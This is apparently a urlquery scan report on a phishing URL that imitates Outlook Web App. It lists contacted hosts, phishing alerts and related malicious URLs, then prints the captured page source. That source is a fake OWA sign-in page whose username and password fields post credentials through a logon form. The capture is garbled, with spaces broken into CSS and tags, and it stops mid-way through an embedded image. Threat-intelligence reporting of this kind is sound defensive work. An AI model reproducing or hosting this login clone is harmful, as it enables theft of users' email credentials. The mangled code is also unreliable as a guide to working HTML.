urlquery - report: 673925.selcdn.ru/owas444o44/334owa.authentic/new.html/

Fully Qualifying Domain Name	Rank	First Seen	Last Seen	IP	Comment
maxcdn.bootstrapcdn.com (2)	724	2014-06-18 00:37:31 UTC	2022-09-28 15:07:43 UTC	104.18.11.207
firefox.settings.services.mozilla.com (2)	867	2020-05-28 17:26:30 UTC	2022-09-28 12:06:36 UTC	143.204.55.36
ocsp.digicert.com (8)	86	2012-05-21 07:02:23 UTC	2022-09-28 16:15:39 UTC	93.184.220.29
stackpath.bootstrapcdn.com (2)	2467	2018-04-05 04:41:29 UTC	2022-09-28 08:53:28 UTC	104.18.11.207
ajax.googleapis.com (1)	12905	2013-08-16 09:51:31 UTC	2022-09-28 16:18:43 UTC	142.250.74.74
img-getpocket.cdn.mozilla.net (6)	1631	2017-09-01 03:40:57 UTC	2022-09-28 08:06:38 UTC	34.120.237.76
ocsp.pki.goog (2)	175	2017-06-14 07:23:31 UTC	2022-09-28 04:36:20 UTC	142.250.74.3
push.services.mozilla.com (1)	2140	2015-09-03 10:29:36 UTC	2022-09-28 05:02:28 UTC	52.43.61.95
673925.selcdn.ru (2)	0	2022-06-03 12:09:15 UTC	2022-09-28 21:36:03 UTC	92.53.68.202	Domain (selcdn.ru) ranked at: 61640
r3.o.lencr.org (6)	344	2020-12-02 08:52:13 UTC	2022-09-28 04:36:09 UTC	23.36.76.226
content-signature-2.cdn.mozilla.net (1)	1152	2020-11-03 12:26:46 UTC	2022-09-28 05:13:47 UTC	34.160.144.191
contile.services.mozilla.com (1)	1114	2021-05-27 18:32:35 UTC	2022-09-28 04:36:06 UTC	34.117.237.239
cdnjs.cloudflare.com (2)	235	2020-10-20 10:17:36 UTC	2022-09-28 05:34:56 UTC	104.17.24.14

Scan Date	Severity	Indicator	Comment
2022-09-28	2	673925.selcdn.ru/owas444o44/334owa.authentic/new.html/	Outlook

Scan Date	Severity	Indicator	Comment
2022-09-28	2	673925.selcdn.ru/owas444o44/334owa.authentic/new.html/	Phishing

Date	UQ / IDS / BL	URL	IP
2022-09-28 21:43:44 +0000	1 - 0 - 2	673925.selcdn.ru/owas444o44/334owa.authentic/ (...)	92.53.68.203
2022-09-23 20:21:34 +0000	0 - 0 - 1	666331.selcdn.ru/office-Unsubscribe-cookie-re (...)	92.53.68.203
2022-09-14 10:34:15 +0000	0 - 0 - 3	780030.selcdn.ru/owa/r.html?email	92.53.68.203
2022-09-14 10:12:18 +0000	1 - 0 - 4	764828.selcdn.ru/owa.osoft-2/owa-slot.htm	92.53.68.203
2022-09-13 08:38:59 +0000	0 - 0 - 3	780030.selcdn.ru/owa/ovva5.html	92.53.68.203

Date	UQ / IDS / BL	URL	IP
2023-03-30 19:18:06 +0000	0 - 4 - 0	dl.old-games.su/get/wC30h5pka5KhFsFo_LfZhg==, (...)	95.213.221.147
2023-03-30 12:51:30 +0000	0 - 2 - 2	176.113.115.177/stilak64.rar	176.113.115.177
2023-03-30 12:41:54 +0000	0 - 2 - 2	94.26.226.51/panel/new_data/pubg1.dat	94.26.226.51
2023-03-30 12:41:49 +0000	0 - 2 - 2	94.26.226.51/panel/new_data/ark.dat	94.26.226.51
2023-03-30 12:41:44 +0000	0 - 2 - 2	94.26.226.51/panel/new_data/hsdwn.dat	94.26.226.51

Date	UQ / IDS / BL	URL	IP
2023-03-29 13:41:00 +0000	0 - 0 - 1	595221.selcdn.ru/crush-super-share/index4.htm (...)	92.53.68.16
2023-03-27 04:32:12 +0000	0 - 0 - 1	862221.selcdn.ru/wallet/connect/NFTs/coinbase (...)	92.53.68.16
2023-03-25 23:25:10 +0000	0 - 0 - 1	862221.selcdn.ru	92.53.68.16
2023-03-25 05:06:34 +0000	0 - 0 - 1	53131.selcdn.ru/	92.53.68.16
2023-03-24 13:33:22 +0000	0 - 0 - 2	862221.selcdn.ru/wallet/connect/NFTs/coinbase (...)	92.53.68.16

Date	UQ / IDS / BL	URL	IP
2023-03-30 06:36:14 +0000	0 - 3 - 7	203.159.154.241/moodle_data/environment/snt/l (...)	203.159.154.241
2023-03-30 04:02:53 +0000	0 - 3 - 7	203.159.154.241/moodle_data/environment/snt/l (...)	203.159.154.241
2023-03-30 02:27:58 +0000	0 - 0 - 6	glenwoodmason.empresasvesta.com/@	192.185.190.180
2023-03-30 02:26:42 +0000	0 - 0 - 4	babyfunnytoys.com/servedata/OWA/laco.php?email=@	192.185.25.252
2023-03-30 01:31:21 +0000	0 - 2 - 5	203.159.154.241/moodle_data/environment/snt/i (...)	203.159.154.241

JavaScript

Executed Scripts (7)

Executed Evals (0)

Executed Writes (1)

#1 JavaScript::Write (size: 45751) - SHA256: 0a8a4f5b64f6500f9cbb3d139b416e783f34319f083de121a0db1d68d324eeba

< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
    < html >
    < head >
    < meta http - equiv = "X-UA-Compatible"
content = "IE=10" / >
    < meta http - equiv = "Content-Type"
content = "text/html; CHARSET=utf-8" >
    < meta name = "Robots"
content = "NOINDEX, NOFOLLOW" >
    < title > Outlook Web App < /title> < link rel = "stylesheet"
href = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" >
    < link rel = "stylesheet"
href = "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" >
    < link href = "https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"
rel = "stylesheet" >
    < script src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js" > < /script> < style >

    .progress {
        overflow: hidden;
    }

.progress > div {
    position: absolute;
    height: 5 px;
    width: 5 px;
    background - color: #0067b8;
        z-index: 100;
        border-radius: 50%;
        opacity: 0;
    }

    .progress {
        position: absolute;
        top: 0;
        left: 0;
        height: 5px;
        width: 100%;
    }

    .progress>div {
        -webkit-animation: progressDot 2s infinite;
        -moz-animation: progressDot 2s infinite;
        -o-animation: progressDot 2s infinite;
        animation: progressDot 2s infinite;
    }

    .progress>div:nth-child(1) {
        -webkit-animation-delay: .05s;
        -moz-animation-delay: .05s;
        -o-animation-delay: .05s;
        animation-delay: .05s;
    }

    .progress>div:nth-child(2) {
        -webkit-animation-delay: .2s;
        -moz-animation-delay: .2s;
        -o-animation-delay: .2s;
        animation-delay: .2s;
    }

    .progress>div:nth-child(3) {
        -webkit-animation-delay: .35s;
        -moz-animation-delay: .35s;
        -o-animation-delay: .35s;
        animation-delay: .35s;
    }

    .progress>div:nth-child(4) {
        -webkit-animation-delay: .5s;
        -moz-animation-delay: .5s;
        -o-animation-delay: .5s;
        animation-delay: .5s;
    }

    .progress>div:nth-child(5) {
        -webkit-animation-delay: .65s;
        -moz-animation-delay: .65s;
        -o-animation-delay: .65s;
        animation-delay: .65s;
    }

    @-webkit-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -webkit-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -webkit-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -webkit-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-moz-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -moz-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -moz-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -moz-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @-o-keyframes progressDot {
        0%,
        20% {
            left: 0%;
            -o-animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            -o-animation-timing-function: linear;
        }
        65% {
            left: 60%;
            -o-animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

    @keyframes progressDot {
        0%,
        20% {
            left: 0%;
            animation-timing-function: ease-out;
            opacity: 0;
        }
        25% {
            opacity: 1;
        }
        35% {
            left: 45%;
            animation-timing-function: linear;
        }
        65% {
            left: 60%;
            animation-timing-function: ease-in;
        }
        75% {
            opacity: 1;
        }
        80%,
        100% {
            left: 100%;
            opacity: 0;
        }
    }

body.rtl
{
	text-align:right;
	direction:rtl;
}

body, .mouse, .twide, .tnarrow, form
{
    height: 100%;
    width: 100%;
    margin: 0px;
}

.mouse, .twide
{
    min-width: 650px; /* min iPad1 dimension */
    min-height: 650px;
    position: absolute;
    top:0px;
    bottom:0px;
    left:0px;
    right:0px;
}

.sidebar
{
    background-color:# 0072 C6;
}

.mouse.sidebar, .twide.sidebar {
    position: absolute;
    top: 0 px;
    bottom: 0 px;
    left: 0 px;
    display: inline - block;
    width: 332 px;
}

.tnarrow.sidebar {
    display: none;
}

.mouse.owaLogoContainer, .twide.owaLogoContainer {
    margin: 213 px auto auto 109 px;
    text - align: left /* Logo aligns left for both ltr & rtl */
}

.tnarrow.owaLogo {
    display: none;
}

.mouse.owaLogoSmall, .twide.owaLogoSmall {
    display: none;
}

.logonDiv {
    text - align: left;
}

.rtl.logonDiv {
    text - align: right;
}

.mouse.logonContainer, .twide.logonContainer {
    padding - top: 174 px;
    padding - left: 464 px;
    padding - right: 142 px;
    position: absolute;
    top: 0 px;
    bottom: 0 px;
    left: 0 px;
    right: 0 px;
    text - align: center;
}

.mouse.logonDiv, .twide.logonDiv {
    position: relative;
    vertical - align: top;
    display: inline - block;
    width: 423 px;
}

.tnarrow.logonDiv {
    margin: 25 px auto auto - 130 px;
    position: absolute;
    left: 50 % ;
    width: 260 px;
    padding - bottom: 20 px;
}

.twide.signInImageHeader, .tnarrow.signInImageHeader {
    display: none;
}

.mouse.signInImageHeader {
    margin - bottom: 22 px;
}

.twide.mouseHeader {
    display: none;
}

.mouse.twideHeader {
    display: none;
}

input::-webkit - input - placeholder {
    font - size: 16 px;
    color: #98A3A6;
}

input:-moz-placeholder
{
    font-size:16px;
    color: # 98 A3A6;
}

.tnarrow.signInInputLabel, .twide.signInInputLabel {
    display: none;
}

.mouse.signInInputLabel {
    margin - bottom: 2 px;
}

.mouse.showPasswordCheck {
    display: none;
}

.signInInputText {
    border: 1 px solid #98A3A6;
    color: # 333333;
    border - radius: 0; - moz - border - radius: 0; - webkit - border - radius: 0;
    box - shadow: none; - moz - box - shadow: none; - webkit - box - shadow: none; - webkit - appearance: none;
    background - color: # FDFDFD;
    width: 250 px;
    margin - bottom: 10 px;
    box - sizing: content - box; - moz - box - sizing: content - box; - webkit - box - sizing: content - box;
}

.mouse.signInInputText {
        height: 22 px;
        font - size: 12 px;
        padding: 3 px 5 px;
        color: #333333;
	font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
	margin-bottom: 20px;
}

.twide .signInInputText, .tnarrow .signInInputText
{
    border-color: # 666666;
        height: 22 px;
        font - size: 16 px;
        color: #000000;
    font: $ShellInputTextTouchFont;
    padding: 7px 7px;
	font-family:'Segoe UI Semibold', 'Segoe WP Semibold', 'Segoe UI WPC Semibold', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-bottom:20px;
	width: 264px;
}

.divMain
{
	width: 444px;
}

.l
{
	text-align:left;
}
.rtl .l
{
	text-align:right;
}
.r
{
	text-align:right;
}
.rtl .r
{
	text-align:left;
}

table# tblMain {
            margin - top: 48 px;
            padding: 0 px;
        }
        table.mid {
            width: 385 px;
            border - collapse: collapse;
            padding: 0 px;
            color: #444444;
}
table.tblConn
{
	direction:ltr;
}
td.tdConnImg
{
	width: 22px;
}
td.tdConn
{
	padding-top: 15px;
}
td# mdLft {
                background: url("lgnleft.gif") repeat - y;
                width: 15 px;
            }
            td # mdRt {
                background: url("lgnright.gif") repeat - y;
                width: 15 px;
            }
            td # mdMid {
                padding: 0 px 45 px;
                background: # ffffff;
                vertical - align: top;
            }
            td.txtpad {
                padding: 3 px 6 px 3 px 0 px;
            }
            .txt {
                padding: 3 px;
                height: 2.2e m;
            }
            input.btn {
                color: # ffffff;
                background - color: # eb9c12;
                border: 0 px;
                padding: 2 px 6 px;
                margin: 0 px 6 px;
                text - align: center;
            }
            .btnOnFcs {
                color: # ffffff;
                background - color: # eb9c12;
                border: 0 px;
                padding: 2 px 6 px;
                margin: 0 px 6 px;
                text - align: center;
            }
            .btnOnMseOvr {
                color: # ffffff;
                background - color: # f9b133;
                border: 0 px;
                padding: 2 px 6 px;
                margin: 0 px 6 px;
                text - align: center;
            }
            .btnOnMseDwn {
                color: #000000;
	background-color: # f9b133;
                border: 0 px solid # f9b133;
                padding: 2 px 6 px;
                margin: 0 px 6 px;
                text - align: center;
            }
            .nowrap {
                white - space: nowrap;
            }
            hr {
                height: 0 px;
                visibility: hidden;
            }

            .wrng {
                color: # ff6c00;
            }
            .disBsc {
                color: #999999;
}
.expl
{
	color:# 999999;
            }
            .w100,
            .txt {
                width: 100 % ;
            }
            .txt {
                margin: 0 px 6 px;
            }
            .rdo {
                margin: 0 px 12 px 0 px 32 px;
            }
            body.rtl.rdo {
                margin: 0 px 32 px 0 px 12 px;
            }
            tr.expl td,
            tr.wrng td {
                padding: 2 px 0 px 4 px;
            }
            tr # trSec td {
                padding: 3 px 0 px 8 px;
            }
            /* language page specific styles */
            td # tdLng {
                padding: 12 px 0 px;
            }
            td # tdTz {
                padding: 8 px 0 px;
            }
            select # selTz {
                padding: 0 px;
                margin: 0 px;
            }
            td # tdOptMsg {
                padding: 10 px 0 px;
            }
            td # tdOptChk {
                padding: 0 px 0 px 15 px 65 px;
            }
            td # tdOptAcc {
                vertical - align: middle;
                padding: 0 px 0 px 0 px 3 px;
            }
            select # selLng {
                margin: 0 px 16 px;
            }
            /* logoff page specific styles */
            td # tdMsg {
                margin: 9 px 0 px 64 px;
            }
            input # btnCls {
                margin: 3 px 6 px;
            }
            td.lgnTL,
            td.lgnBL {
                width: 456 px;
            }
            td.lgnTM {
                background: url("lgntopm.gif") repeat - x;
                width: 100 % ;
            }
            td.lgnBM {
                background: url("lgnbotm.gif") repeat - x;
                width: 100 % ;
            }
            td.lgnTR,
            td.lgnBR {
                width: 45 px;
            }
            table.tblLgn {
                padding: 0 px;
                margin: 0 px;
                border - collapse: collapse;
                width: 100 % ;
            }
            .signInBg {
                margin: 0 px;
            }

            .signInTextHeader {
                font - size: 60 px;
                color: #404344;
	font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
	margin-bottom:18px;
	white-space: nowrap;
}

.signInInputLabel
{
	font-size:12px;
	color:# 666666;
                font - family: 'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans - serif;
            }

            .signInCheckBoxText {
                font - size: 12 px;
                color: #6A7479;
	font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-top:16px;
}

.twide .signInCheckBoxText, .tnarrow .signInCheckBoxText
{
    font-size: 15px;
}

.signInCheckBoxLink
{
	font-size:12px;
	color:# 0072 C6;
                font - family: 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans - serif;
            }

            .signInEnter {
                font - size: 22 px;
                color: #0072C6;
	font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
	margin-top:20px;
}

.twide .signInEnter
{
	margin-top:17px;
	font-size: 29px;
}

.tnarrow .signInEnter
{
	margin-top:2px;
	font-size: 29px;
	position: relative;
	float: left;
	left: 50%;
}

.signinbutton
{
    cursor:pointer;
    display:inline
}

.mouse .signinbutton
{
    padding: 0px 8px 5px 8px;
    margin-left: -8px;
}

.rtl .mouse .signinbutton
{
    margin-right: -8px;
}

.tnarrow .signinbutton
{
	position: relative;
	float: left;
	left: -50%;
}

.shellDialogueHead
{
	font-size:29px;
	color:# 0072 C6;
                font - family: 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans - serif;
            }

            .mouse.shellDialogueHead {
                line - height: 35 px;
                margin - bottom: 10 px;
            }

            .twide.shellDialogueHead,
            .tnarrow.shellDialogueHead {
                line - height: 34 px;
                margin - bottom: 12 px;
            }

            .shellDialogueMsg {
                font - size: 13 px;
                color: #333333;
	font-family:'Segoe UI', 'Segoe WP', 'Segoe UI WPC', Tahoma, Arial, sans-serif;
	line-height:18px;
}

.twide .shellDialogueMsg, .tnarrow .shellDialogueMsg
{
    font-size: 15px;
}

.headerMsgDiv
{
    width: 350px;
    margin-bottom: 22px;
}

.twide .headermsgdiv
{
    margin-bottom: 30px;
}

.tnarrow .headermsgdiv
{
    width: 260px;
    margin-bottom: 30px;
}

.signInError
{
	font-size:12px;
	color:# C1272D;
                font - family: 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans - serif;
                margin - top: 12 px;
            }

            .passwordError {
                color: # A80F22;
                font - family: 'Segoe UI',
                'Segoe WP',
                'Segoe UI WPC',
                Tahoma,
                Arial,
                sans - serif;
                line - height: 18 px;
            }

            .mouse.passwordError {
                margin - top: 10 px;
                font - size: 13 px;
            }

            .twide.passwordError,
            .tnarrow.passwordError {
                margin - top: 12 px;
                font - size: 15 px;
            }

            .signInExpl {
                font - size: 12 px;
                color: #999999;
	font-family:'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-top:5px;
}

.signInWarning
{
	font-size:12px;
	color:# C1272D;
                font - family: 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI WPC Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans - serif;
                margin - top: 5 px;
            }

            input.chk {
                margin - right: 9 px;
                margin - left: 0 px;
            }

            .imgLnk {
                vertical - align: middle;
                line - height: 2;
                margin - top: -2 px;
            }

            .signinTxt {
                padding - left: 11 px;
                padding - right: 11 px; /* Needed for RTL, doesnt hurt to add this for LTR as well */
            }

            .hidden - submit {
                border: 0 none;
                height: 0;
                width: 0;
                padding: 0;
                margin: 0;
                overflow: hidden;
            }

            .officeFooter {
                position: absolute;
                bottom: 33 px;
                right: 45 px;
            }

            .tnarrow.officeFooter {
                display: none;
            } < /style>





            < script >

            var mainLogonDiv = window.document.getElementById("mainLogonDiv");
            var showPlaceholderText = false;
            var mainLogonDivClassName = 'mouse';

            if (mainLogonDivClassName == "tnarrow") {
                showPlaceholderText = true;

                // Output meta tag for viewport scaling
                document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />');
            } else if (mainLogonDivClassName == "twide") {
                showPlaceholderText = true;
            }

            function setPlaceholderText() {
                window.document.getElementById("username").placeholder = "user name";
                window.document.getElementById("password").placeholder = "password";
                window.document.getElementById("passwordText").placeholder = "password";
            }

            function showPasswordClick() {
                var showPassword = window.document.getElementById("showPasswordCheck").checked;
                passwordElement = window.document.getElementById("password");
                passwordTextElement = window.document.getElementById("passwordText");
                if (showPassword) {
                    passwordTextElement.value = passwordElement.value;
                    passwordElement.style.display = "none";
                    passwordTextElement.style.display = "inline";
                    passwordTextElement.focus();
                } else {
                    passwordElement.value = passwordTextElement.value;
                    passwordTextElement.style.display = "none";
                    passwordTextElement.value = "";
                    passwordElement.style.display = "inline";
                    passwordElement.focus();
                }
            } < /script>

            < /head> < body class = "signInBg"
            style = "background: #f2f2f2 url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAANvCAYAAADk40vJAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA+VpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcDpDcmVhdGVEYXRlPSIyMDEyLTA1LTE1VDEzOjEwOjU5LTA3OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAxMi0wNS0xNVQxMzoxMTo0Ni0wNzowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxMi0wNS0xNVQxMzoxMTo0Ni0wNzowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6MzI2NTAzNjQ5RUNBMTFFMUFBNkRCNDc2QzU0RjhERUYiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6MzI2NTAzNjU5RUNBMTFFMUFBNkRCNDc2QzU0RjhERUYiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDozMjY1MDM2MjlFQ0ExMUUxQUE2REI0NzZDNTRGOERFRiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDozMjY1MDM2MzlFQ0ExMUUxQUE2REI0NzZDNTRGOERFRiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PnYK5fsAAAFLSURBVHja7NthDoIwDAZQNN7/vCTKKifQgZh12yPx30uG/bqyGLyt6xpLxXVfKi8QBEEQBEEQBEEQBEEQBEEQBEEQBEEQBEEQBEEQBMFh4WP/ePUSBEEQBEHQIQ4EQRA0cUHQdgVBe0Z5QN0Dalx1lAwoGcmAklEeyShP2/I8QlNoCuWRzJXlCeXRuGfvMSSjcX1rjat7NK6llUcyyqM8kvlh6X3dIhmNe2pp5ZGMpQ8nE8qT9R6LZFLeY0xYHnvm69G1h/NjmXJpjWukSGa4ZGIzUpI+C3vYMzM+C6Nu6XmH/XwjpZc9I5mkwz6K8iRtXMlI5mwy0TKZV/Zhf/kZd6g903akxJyN28Ow3ySTdKQ0SyZajpRyKfzPr1wNG3czUj5t1x6G/TbhSKlMZqiRcuhk365xI/2wj6aN+0y+Z25R98LQWH8QeQswAHk7x/k/TxxLAAAAAElFTkSuQmCC') repeat-x" / >



            < noscript >
            < div id = "dvErr" >
            < table cellpadding = "0"
            cellspacing = "0" >
            < tr >
            < td > < img src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAptJREFUeNqkU01LVFEYfu7XzJ17nZmyJBW0sgRDRAgLoi8tghZG9QNaR7tg2vQjbCu2a9Eq2qRGUYFBZAtLURzSUUcJG8d0ZnTu99fpPdIMSktfOOfcezjP8z7vc94jMMZwmJD5JAhCfWPm0e2+MGKDYRQNBCHrpTWi/1kaExFjY7defp6qneXJhb3pHwGBH4qy8uSIrp9NqjJ0TXsXuvZ0KfvjacEVsIlEzhXkofuvJ0f+I+BgVdOftfZe0OIsQBBTFxLX7raxCIH75vn3xOjwQDbQsSgfNw0pkXkwPjXCsWJNNjFlmttPaWrqKBBTEb9yr0No7tCEptaU3H3xMgQJp90imo2C7plGZvhmbx/H7hHwmnUJnWpjI8L1ZSg7fyBoSQWUHo4FIabFwEJE5HeLX4JmVzqrtjdYN5GM6k95FlhpE4q5A8GzEWzkITYkKYWEqLgG+C58IgiIMx1WkfX0/joBud2Tsrco+wokZ5dAIsL5Scgnu8ACH/7qTyL14RDYo/NJZqPq+D37FYDtlqHlp6n+xF7WYHkO8ZBkE6G9tgQ3BCwabsTdBwzbw34P5oohfZaKwHYB2CrA+bWCyKwgyC/AIU+qnIDAAYE3PAmG48/tU8Am1uXU9XR1A4rrQ6S2iHwP9pe3dIc2/OouTCLgJfBYNCVYrj9RV8A7rCIncwvSMWz5JIDUyW2dkXr1DmKnzxFBuVwDZw0JMxXkLC8YqxPw9vSk2NC62mQui2mUA9rsvpSX0o1+vL2r7InxFzXwp03R/G1GQx9Na6pOwIO3p6U0ZFbjLbl56QRY9tsZbyU7W/jwalyKq4/fb6sYLSq5JUPIfA28kRruwFvgwTuMNwmNG3RV58ntkAyb5jVz2bXMB97CYeKvAAMACjWGjcO+NcIAAAAASUVORK5CYII="
            alt = "" > < /td> < td style = "width:10> < /tr> < /table> < /div> < /noscript>

            < form method = "POST"
            name = "logonForm"
            ENCTYPE = "application/x-www-form-urlencoded"
            autocomplete = "off" >
            < input type = "hidden"
            name = "flags"
            value = "4" >
            < input type = "hidden"
            name = "forcedownlevel"
            value = "0" >
            < i class = "fa fa-arrow-left" > < /i> <span id="test"></span >

            <!-- Default to mouse class, so that things don't look wacky if the script somehow doesn't apply a class -->
            < div id = "mainLogonDiv"
            class = "mouse" >
            < script >

            var mainLogonDiv = window.document.getElementById("mainLogonDiv");
            mainLogonDiv.className = mainLogonDivClassName; < /script> < div class = "sidebar" >
            < div class = "owaLogoContainer" >
            < img src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABsCAYAAACiuLoyAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOkMwQzQ2MDA4RjEzRTExRTFCMzNFQTMwMzE5REU3RjExIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOkMwQzQ2MDA5RjEzRTExRTFCMzNFQTMwMzE5REU3RjExIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QzBDNDYwMDZGMTNFMTFFMUIzM0VBMzAzMTlERTdGMTEiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QzBDNDYwMDdGMTNFMTFFMUIzM0VBMzAzMTlERTdGMTEiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz5qf500AAAGPUlEQVR42uxdOXLjRhRtqJSbPsFg5gIiaw4gsmociwocm0zslIwcijyBNOE4EfMJpInHVaQO4BJvIN5A9Ang/uKHq93Gjm4AjX6vqmug4YLlP7y/NZqB8AhRFA3kP0MeF3KEcozl2AVBMOnB+ZX+zHmPjT1mA9O4ZKMPBNAvAkhDhwl39RCm7RkBMuQb6BsBIN+eEADy7QkBIN8eEQDy7QkBIN+eEADy7REBIN8eEkAa/QHy7bcCTHEZ/MUZLgEIAIAAAAgAgAAACACAAAAIAIAAAAgAeIBzXIL/I4qiW+FGb+Qox5McmyAIjiCAOZDxx44cK/VyfpGknTAh4AI8JewtYgC/MQMB/MYaMYCfIL8/l0HgY5VnA6EAbmMvx4SMjzqAf3hk4+/rfAkI4CaW0vDXau4v5X8IAvjh7+muv1P/UxqfMoAtgsD++3u66w+a8Sn/X1T9UhDADWxY9lXJH/BdX6tk3SQBjhy4UO2aWLyPT0h5IOVKYJq6DkrxNtpdP2Tj139oJ7KPV/JRzNgixzMgWYuaxVY7hm3UPl6TAju+lmkQZcdZA9L1nhhctFtF75NjKTdHrBQ+YsfXba/dGPdy897kjs4sS9e8apuST37EwY9PuKMVyzR/H7Lkz0zv7Myi8Td1v4QvwsQTJYhLuktN8ik+eha